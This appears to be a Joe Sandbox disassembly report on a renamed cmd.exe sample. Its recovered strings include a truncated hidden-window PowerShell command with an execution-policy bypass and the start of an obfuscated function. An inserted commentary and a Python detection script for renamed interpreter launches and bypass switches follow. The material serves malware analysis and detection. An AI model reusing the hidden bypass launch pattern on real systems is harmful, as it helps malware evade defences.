                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                                                      • API String ID: 3510147486-2605508654
                                                                                                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                      • Instruction ID: 0bcf1587271e0b5ce62656cad237ee7fbf5ee5365911317c6a1c377ee08d45d1
                                                                                                                      • Instruction Fuzzy Hash: 2161293A608BC2CAEB658F21D8443EAB7A4FB45F95F444135DA0D8B768DF78DA45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF6154F7279,?,?,?,?,?,00007FF6154FBFA9), ref: 00007FF615514485
                                                                                                                      Similarity
                                                                                                                      • API ID: longjmp
                                                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                      • API String ID: 1832741078-366822981
                                                                                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                      • Instruction ID: 0701d72f038bbee938f658a1b3faebe36b3e592fee8e5d3f94461ee42039c278
                                                                                                                      • Instruction Fuzzy Hash: EDC17E68E0CE42C1E628DF5A55905BDAFA1AB46FA4F916036DD0DD76B1CF3CAC46C340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID: Heapwcschr$AllocateProcessmemset
                                                                                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                      • API String ID: 2060774286-969133440
                                                                                                                      • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                      • Instruction ID: ccb66dcd33a02d0ffe406fcad70186da03e5273b36123d48c4b9630015d3967c
                                                                                                                      • Instruction Fuzzy Hash: 5AB17225A0DE8281EA608B1D9488279E7A0FF4AFA4F554236CA5EC77B4DF3CEC558700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ$NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){$HJBVM=[System.Secu
                                                                                                                      • API String ID: 0-286494561
                                                                                                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                      • Instruction ID: 8fa1f6ee290fdf6532f2c107a1c70f30921486b8ed21701645013e354e4328ef
                                                                                                                      • Instruction Fuzzy Hash: BA516929A0CE53C6FB549F20E4443B8ABA1BF55FA9F405036DA0EC66B5DF3CAC468701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                      • String ID: 0123456789$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
                                                                                                                      • API String ID: 1606811317-1934752915
                                                                                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                      • Instruction ID: 5e2df4a1ebe73c5c48e9c9cdd219d8ddbac8db37b9d5f22b0f319a26a386f6a9
                                                                                                                      • Instruction Fuzzy Hash: 36D19029A08E8292EA508B29A840179B7A0FF45FB4F845132DE6ED77B5DF3CEC15C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                                                      • String ID: %04X-%04X$~
                                                                                                                      • API String ID: 2748242238-2468825380
                                                                                                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                      • Instruction ID: 0c288460468142ccad92143f6a5e32a9b365263dcaf035a1ef4376a9bf912e06
                                                                                                                      • Instruction Fuzzy Hash: FBA17266709FC1CAEB258F21D8402E9B7A1FB85F94F408135DA4D8BB69DF3CDA458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                      • API String ID: 2348642995-441775793
                                                                                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                      • Instruction ID: 3881cb66ca690c921efd156e9419d1cc882bf004edaefe0833ab4cd679ab186a
                                                                                                                      • Instruction Fuzzy Hash: 23716D7AD08E46C5E7605F25D410179F7A0EB49FA8F68D032DA4EC62A5EF3CE984C721
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Similarity
                                                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                      • String ID: FAT$~
                                                                                                                      • API String ID: 2238823677-1832570214
                                                                                                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                      • Instruction ID: 06c52c93fde41796efe2c4c7356c8bcdc0fa0084f3097c1c1c51e4a471e33e06
                                                                                                                      • Instruction Fuzzy Hash: 66717E36608FC1C9EB61CF25D8502EAB7A4FB45F98F408036DA4D8BB69DF38DA458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD884
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD89D
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD94D
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD964
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF6154FDB89
                                                                                                                      • wcstol.MSVCRT ref: 00007FF6154FDBDF
                                                                                                                      • wcstol.MSVCRT ref: 00007FF6154FDC63
                                                                                                                      • memmove.MSVCRT ref: 00007FF6154FDD33
                                                                                                                      • memmove.MSVCRT ref: 00007FF6154FDE9A
                                                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FDF1F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1051989028-0
                                                                                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                      • Instruction ID: 2c8f0d18d96ec33c8e625eb04d8f58fa342ed2043f75fd8c8ab445d2a2c0139e
                                                                                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                      • Instruction Fuzzy Hash: 52026276A08E8181EB249F1DE44427AB7A1FB45FA4F554232DAEE837A4DF7CD861C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                      • API String ID: 3223794493-3086019870
                                                                                                                      • Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                      • Instruction ID: c456483154f0e06ef58ce098f5f2513dd1875c9a7324b8276e7d294ab630e5a8
                                                                                                                      • Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                      • Instruction Fuzzy Hash: 73515E39A08E42C6FA548F29A850179BBA0FB49F74F585536CA1E873B1EF3CE855C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155058E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF61551C6DB), ref: 00007FF6155058EF
                                                                                                                        • Part of subcall function 00007FF61550081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61550084E
                                                                                                                      • towupper.MSVCRT ref: 00007FF61551C1C9
                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF61551C31C
                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF61551C5CB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                      • String ID: %s $%s>$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX$PROMPT$Unknown$\$x
                                                                                                                      • API String ID: 2242554020-4229170036
                                                                                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                      • Instruction ID: ba75d7c814e1ead325304321f3b9b455760ee17ce7395e2c8cdb1f611546ece8
                                                                                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                      • Instruction Fuzzy Hash: 86127029A18E5281EA649F29E48417AABB0EF44FB4F554236D99E837F0DF3DED41C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
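The string table of this function is the security-relevant part of the listing: the renamed cmd.exe (the snapshot file is named $sxr-cmd) builds and launches C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, which is what the report's "Renames powershell.exe to bypass HIPS" and "Powershell is started from unusual location" signatures key on. Renaming does not change the PE version resource, so the OriginalFileName that a Sysmon Event ID 1 record carries still reads PowerShell.EXE or Cmd.Exe while the image path and basename do not. The detection logic below is an added example, not Joe Sandbox or sample code: it resolves PowerShell host switches approximately the way powershell.exe accepts abbreviations (-ep, -w, -enc, -c) and runs over constructed events. The only value taken from the page is the recovered command line; the OriginalFileName values, the expected interpreter directories and the other three events are assumptions.

```python
r"""Flag renamed cmd.exe / powershell.exe launches with execution-policy bypass.

Added example for this report, not Joe Sandbox or sample code. The only value
taken from the page is the command line recovered from the renamed cmd.exe;
every other event field is constructed test data using Sysmon Event ID 1 field
names (Image, OriginalFileName, CommandLine).
"""
import ntpath

# powershell.exe host switches as (name, shortest accepted prefix). This
# approximates ConsoleHost's matcher: a token matches the first name that
# starts with it, provided the token is at least the shortest prefix long.
PS_SWITCHES = [
    ("psconsolefile", "p"), ("version", "v"), ("nologo", "nol"), ("noexit", "noe"),
    ("sta", "s"), ("mta", "mta"), ("noprofile", "nop"), ("noninteractive", "noni"),
    ("inputformat", "if"), ("outputformat", "of"), ("windowstyle", "w"),
    ("encodedcommand", "e"), ("configurationname", "config"), ("file", "f"),
    ("executionpolicy", "ex"), ("command", "c"),
]
PS_ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
TAKES_VALUE = {"psconsolefile", "version", "inputformat", "outputformat",
               "windowstyle", "encodedcommand", "configurationname", "executionpolicy"}
PAYLOAD = {"command", "file"}           # the rest of the line is the payload
PS_ONLY = {"nologo", "noexit", "noprofile", "noninteractive", "windowstyle",
           "encodedcommand", "executionpolicy"}   # cmd.exe has no such switches

# Where each binary (keyed by its PE OriginalFileName) legitimately lives.
# Assumption: the estate runs no relocated copies of these interpreters.
CANONICAL = {"powershell.exe": "powershell.exe", "cmd.exe": "cmd.exe"}
EXPECTED_DIRS = {
    "powershell.exe": {r"c:\windows\system32\windowspowershell\v1.0",
                       r"c:\windows\syswow64\windowspowershell\v1.0"},
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}


def resolve_switch(token):
    """Map '-ExecutionPolicy', '-ep', '-ex', '/c', ... to a canonical switch name."""
    key = token[1:].lower()
    if key in PS_ALIASES:
        return PS_ALIASES[key]
    for name, shortest in PS_SWITCHES:
        if name.startswith(key) and len(key) >= len(shortest):
            return name
    return None          # unknown or ambiguous (e.g. '-n')


def parse_ps_flags(cmdline):
    """Return {switch: value or True} for host switches before the payload.

    Splits on whitespace, so quoted values containing spaces are truncated;
    sufficient for the switch/value pairs this detection keys on.
    """
    tokens = cmdline.split()
    flags = {}
    i = next((n for n, t in enumerate(tokens) if t[0] in "-/"), len(tokens))
    while i < len(tokens):
        switch = resolve_switch(tokens[i]) if tokens[i][0] in "-/" else None
        if switch is None:
            break
        if switch in PAYLOAD:
            flags[switch] = " ".join(tokens[i + 1:])
            break
        if switch in TAKES_VALUE and i + 1 < len(tokens):
            flags[switch] = tokens[i + 1]
            i += 2
        else:
            flags[switch] = True
            i += 1
    return flags


def detect(event):
    """Return the findings for one process-creation event (empty list = clean)."""
    findings = []
    directory, base = ntpath.split(event.get("Image", "").lower())
    canonical = CANONICAL.get(event.get("OriginalFileName", "").lower())
    if canonical and base != canonical:
        findings.append(f"renamed_binary:{base}->{canonical}")
    if canonical and directory not in EXPECTED_DIRS[canonical]:
        findings.append(f"unusual_location:{directory}")
    flags = parse_ps_flags(event.get("CommandLine", ""))
    if str(flags.get("executionpolicy", "")).lower() in {"bypass", "unrestricted"}:
        findings.append("execution_policy_bypass")
    if str(flags.get("windowstyle", "")).lower() == "hidden":
        findings.append("hidden_window")
    if flags.keys() & PS_ONLY and base not in {"powershell.exe", "pwsh.exe"}:
        findings.append("powershell_switches_under_foreign_image_name")
    return findings


SAMPLE_EVENTS = [  # constructed; only the first CommandLine is from the report
    {"Image": r"C:\Windows\$sxr-powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive "
                    r"-WindowStyle hidden -ExecutionPolicy bypass -Command function ZX"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-Process"'},
    {"Image": r"C:\Windows\$sxr-cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"C:\Windows\$sxr-cmd.exe /c echo constructed"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c "dir"'},
]


def scan(events):
    """Run detect() over a batch and key the findings by image path."""
    return {e["Image"]: detect(e) for e in events}


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS).items():
        print(image, "->", hits or "clean")
```

The OriginalFileName check is the one that survives renaming; the directory and switch heuristics are there for telemetry that lacks version-resource fields, and the prefix matcher keeps -ep bypass or -w hidden from slipping past a rule that only looks for the spelled-out switch names. Note that the renamed cmd.exe in the third event is caught by OriginalFileName alone, since its /c switch is not PowerShell-specific.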

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                      • String ID: \\.\
                                                                                                                      • API String ID: 799470305-2900601889
                                                                                                                      • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                                      • Instruction ID: 8d63d665b7988feeac4a21a575676276861c5b078103f8b62407f5e8eae0ee79
                                                                                                                      • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                                      • Instruction Fuzzy Hash: 9D519836A18E82C5EB608F21D8102B9B7A0FF89F68F594536DA5EC77A4DF3CD9458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1944892715-0
                                                                                                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                      • Instruction ID: dbe14818d678b9d412327ca7badd2c1a5a300e45dfa0dcadf52d0719ff2a4a78
                                                                                                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                      • Instruction Fuzzy Hash: 6CB16C35A09E52C6FA649F29A854179E6A1AF55FB4F458536CA4ECB3B1EF3CEC408300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154F54DE
                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6154F552B
                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6154F554F
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF61551345F
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF61551347E
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6155134C3
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6155134DB
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6155134FA
                                                                                                                        • Part of subcall function 00007FF6155036EC: _get_osfhandle.MSVCRT ref: 00007FF615503715
                                                                                                                        • Part of subcall function 00007FF6155036EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615503770
                                                                                                                        • Part of subcall function 00007FF6155036EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1356649289-0
                                                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                      • Instruction ID: f8623ab528c641204bc2f2149f410dd746a06c768809012053ecc196fa741ce7
                                                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                      • Instruction Fuzzy Hash: 28919F36A08A42C7EB149F25A444179FBA1FB88FA4F554135DA4E837B6DF3CE844CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                      • String ID: %s$/-.$:
                                                                                                                      • API String ID: 1644023181-879152773
Uniqueness
Uniqueness Score: -1.00%
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615517251), ref: 00007FF61551628E
Strings
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
• String ID: $Application$System
• API String ID: 3377411628-1881496484
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
